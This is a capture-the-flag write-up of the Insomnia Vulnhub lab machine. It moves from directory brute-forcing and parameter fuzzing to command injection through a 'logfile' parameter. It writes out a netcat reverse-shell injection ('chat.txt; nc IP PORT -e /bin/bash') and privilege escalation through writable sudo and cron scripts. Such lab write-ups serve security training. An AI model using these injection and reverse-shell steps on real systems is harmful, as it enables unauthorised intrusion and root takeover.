Insomnia Vulnhub Writeup (First blood)

Difficulty: Easy/Medium (In my opinion)

NMAP:

Nice port 8080 is open, so let’s browse

as we can see there is a chat, but we can’t do anything so, we use dirb to brute-force directories

DIRB:

Ok we found the directory “administration.php” and other but there are rabbit hole , let’s browse this directory

Nice “Your activity has been logged”, but we can do nothing here, so let’s fuzz some parameter

ARJUN:

We found the parameter “logfile” so , we can do an LFI? mmmh No! Doesn’t work, but we can do command injection, and the result will appear directly in the chat!

COMMAND INJECTION:

And

Will appear some files! Nice , we notice that “chat.txt” can execute commands so

And

Wow! www-data so , let’s go for the reverse shell!

Command: chat.txt; nc IP PORT -e /bin/bash and listen first!

HORIZONTAL PRIVILEGE ESCALATION:

sudo -l

Nice that “start.sh” had user “julia” privilege, so add /bin/bash in that script

Nice!!!

VERTICAL PRIVILEGE ESCALATION:

Initially we do not notice anything interesting but, if we try to see in / etc / crontab we notice a file running on the system and running, so we can exploit it.

For convenience it uses pspy64 which shows me the files that are running on the system. To understand how often it is performed.

Now put pspy64 on target shell in /tmp directory and give privilege “chmod +x pspy64 and run it ./pspy64

And run now!

as we can see every 1 minutes, we run the “check.sh” script so we also notice that it is an editable file! Then let’s add our payload for the reverse shell.

Just wait and listen on port 4444, and…..

WE ARE ROOT!

Thank you everyone, i hope this is useful!

-0xJin

--

--

--

| eCPTX | C|EH Master | CompTIA Security + | eJPT |

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Project Selection Optimization With R

Remote Procedure Calls (RPC) Concept….

The best things in life are free – love, air & software.

Go (<-the verb) minimal with Go (<-the language) & Docker…and tell Slack about it of course

The eJPT Success story: How I passed it (with BONUS Resources!)

Open Source Mac File Sync Software

Looking At Coding Bootcamps? 5 Things To Watch For

Invisible 2019 Q3 OKRs

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xJin

0xJin

| eCPTX | C|EH Master | CompTIA Security + | eJPT |

More from Medium

Exghost — PG Walkthrough

Luke

Anonymous

HTB - Sick Rop [Pwn]